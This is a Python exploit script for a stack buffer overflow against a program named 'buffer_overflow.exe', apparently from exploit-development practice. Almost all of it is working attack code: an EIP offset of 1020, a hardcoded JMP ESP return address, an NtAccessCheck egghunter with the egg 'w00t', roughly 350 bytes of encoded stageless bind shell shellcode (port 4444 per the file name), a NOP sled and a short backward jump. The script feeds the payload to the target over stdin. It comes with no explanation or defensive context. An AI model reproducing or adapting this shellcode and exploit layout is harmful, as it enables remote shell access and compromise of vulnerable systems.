Bind_Stageless_Shell_4444.py

1. #! python
2.  
3. import os
4. import sys
5. import subprocess
6. import binascii
7. import time
8. import struct
9.  
10.  
11.  
12. #Convert (77C35459) to Little Endian
13. ESP_Address = "\x59\x54\xc3\x77"
14.  
15.  
16. Offset_EIP = 1020
17.  
18. #egg (w00t)
19. egg = "\x77\x30\x30\x74"
20. #egghunter NtAccessCheck (AndAuditAlarm) - 32 Bytes
21. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" +\
22. "\x77\x30\x30\x74" + \
23. "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
24.  
25. #Stageless Shell Bad Chars '\x00\x0a\x1a' Shellcode size is 350 Bytes
26. shellcode = ""
27. shellcode += "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
28. shellcode += "\xb1\xd0\xb9\x59\x83\xeb\xfc\xe2\xf4\x4d\x38\x3b\x59"
29. shellcode += "\xb1\xd0\xd9\xd0\x54\xe1\x79\x3d\x3a\x80\x89\xd2\xe3"
30. shellcode += "\xdc\x32\x0b\xa5\x5b\xcb\x71\xbe\x67\xf3\x7f\x80\x2f"
31. shellcode += "\x15\x65\xd0\xac\xbb\x75\x91\x11\x76\x54\xb0\x17\x5b"
32. shellcode += "\xab\xe3\x87\x32\x0b\xa1\x5b\xf3\x65\x3a\x9c\xa8\x21"
33. shellcode += "\x52\x98\xb8\x88\xe0\x5b\xe0\x79\xb0\x03\x32\x10\xa9"
34. shellcode += "\x33\x83\x10\x3a\xe4\x32\x58\x67\xe1\x46\xf5\x70\x1f"
35. shellcode += "\xb4\x58\x76\xe8\x59\x2c\x47\xd3\xc4\xa1\x8a\xad\x9d"
36. shellcode += "\x2c\x55\x88\x32\x01\x95\xd1\x6a\x3f\x3a\xdc\xf2\xd2"
37. shellcode += "\xe9\xcc\xb8\x8a\x3a\xd4\x32\x58\x61\x59\xfd\x7d\x95"
38. shellcode += "\x8b\xe2\x38\xe8\x8a\xe8\xa6\x51\x8f\xe6\x03\x3a\xc2"
39. shellcode += "\x52\xd4\xec\xb8\x8a\x6b\xb1\xd0\xd1\x2e\xc2\xe2\xe6"
40. shellcode += "\x0d\xd9\x9c\xce\x7f\xb6\x2f\x6c\xe1\x21\xd1\xb9\x59"
41. shellcode += "\x98\x14\xed\x09\xd9\xf9\x39\x32\xb1\x2f\x6c\x33\xb9"
42. shellcode += "\x89\xe9\xbb\x4c\x90\xe9\x19\xe1\xb8\x53\x56\x6e\x30"
43. shellcode += "\x46\x8c\x26\xb8\xbb\x59\xa0\x8c\x30\xbf\xdb\xc0\xef"
44. shellcode += "\x0e\xd9\x12\x62\x6e\xd6\x2f\x6c\x0e\xd9\x67\x50\x61"
45. shellcode += "\x4e\x2f\x6c\x0e\xd9\xa4\x55\x62\x50\x2f\x6c\x0e\x26"
46. shellcode += "\xb8\xcc\x37\xfc\xb1\x46\x8c\xd9\xb3\xd4\x3d\xb1\x59"
47. shellcode += "\x5a\x0e\xe6\x87\x88\xaf\xdb\xc2\xe0\x0f\x53\x2d\xdf"
48. shellcode += "\x9e\xf5\xf4\x85\x58\xb0\x5d\xfd\x7d\xa1\x16\xb9\x1d"
49. shellcode += "\xe5\x80\xef\x0f\xe7\x96\xef\x17\xe7\x86\xea\x0f\xd9"
50. shellcode += "\xa9\x75\x66\x37\x2f\x6c\xd0\x51\x9e\xef\x1f\x4e\xe0"
51. shellcode += "\xd1\x51\x36\xcd\xd9\xa6\x64\x6b\x49\xec\x13\x86\xd1"
52. shellcode += "\xff\x24\x6d\x24\xa6\x64\xec\xbf\x25\xbb\x50\x42\xb9"
53. shellcode += "\xc4\xd5\x02\x1e\xa2\xa2\xd6\x33\xb1\x83\x46\x8c"
54.  
55. Dummy_Data = ('\x41' * 200)
56. NoOpSled_ToEggHunter = ('\x90' * (Offset_EIP - 5 - (len(Dummy_Data) + len(egg) + len(egg) + len(shellcode) + len(egghunter))))
57.  
58. #Jumps back -60 Btyes
59. JmpBack = "\xeb\xc4"
60.  
61. final_payload = Dummy_Data + egg + egg + shellcode + NoOpSled_ToEggHunter + egghunter + "\x41" * 5 + ESP_Address + JmpBack
62. final_payload_bytes = final_payload.encode('raw_unicode_escape')
63.  
64. print(hex(final_payload_bytes[1020]))
65. #print(hex(binascii.unhexlify(final_payload[0])))
66. p = subprocess.Popen('buffer_overflow.exe', stdin=subprocess.PIPE) #NOTE: no shell=True here
67. p.stdin.write(final_payload_bytes)
68. p.communicate()[0]
69. p.stdin.close()